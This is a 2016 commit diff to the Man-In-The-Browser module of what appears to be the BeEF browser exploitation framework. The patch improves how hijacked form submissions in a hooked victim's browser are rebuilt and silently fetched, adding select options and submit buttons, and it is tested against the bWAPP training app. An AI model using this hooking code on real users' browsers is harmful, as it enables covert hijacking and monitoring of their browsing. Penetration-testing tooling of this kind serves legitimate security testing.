Modified the Man-In-The-Browser logic of building query string in form fetching. Previous implementation couldn't handle properly option and submit parameters, therefore a MITB-ed user wasn't sending correct query string which should include those two more fields. For instance, bWAPP application (by IT SEC Games) makes choosing a bug to exploit by submitting form consisting of an option and <button> with type=submit. With this patch an user behind MITB will be able to successfully fetch the form and thus proceed to the next bug.

2016-03-07 18:01:37 +01:00
parent 815eff8d4e
commit e14b5f953a
1 changed files with 23 additions and 2 deletions
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -114,18 +114,39 @@ beef.mitb = {
    // Hooks forms and prevents them from linking away
    poisonForm:function (form) {
        form.onsubmit = function (e) {
+
+            // Collect <input> tags.
            var inputs = form.getElementsByTagName("input");
            var query = "";
            for (var i = 0; i < inputs.length; i++) {
-                if (i > 0 && i < inputs.length - 1) query += "&";
                switch (inputs[i].type) {
                    case "submit":
                        break;
                    default:
-                        query += inputs[i].name + "=" + inputs[i].value;
+                        query += inputs[i].name + "=" + inputs[i].value + '&';
                        break;
                }
            }
+
+            // Collect selected options from the form.
+            var selects = form.getElementsByTagName("select");
+            for (var i = 0; i < selects.length; i++) {
+                var select = selects[i];
+                query += select.name + "=" + select.options[select.selectedIndex].value + '&';
+            }
+
+            // We should be gathering 'submit' inputs as well, as there are 
+            // applications demanding this parameter.
+            var submit = $j('*[type="submit"]', form);
+            if(submit.length) {
+                // Append name of the submit button/input.
+                query += submit.attr('name') + '=' + submit.attr('value');
+            }
+
+            if(query.slice(-1) == '&') {
+                query = query.slice(0, -1);
+            }
+
            e.preventdefault;
            beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
            history.pushState({ Be:"EF" }, "", form.action);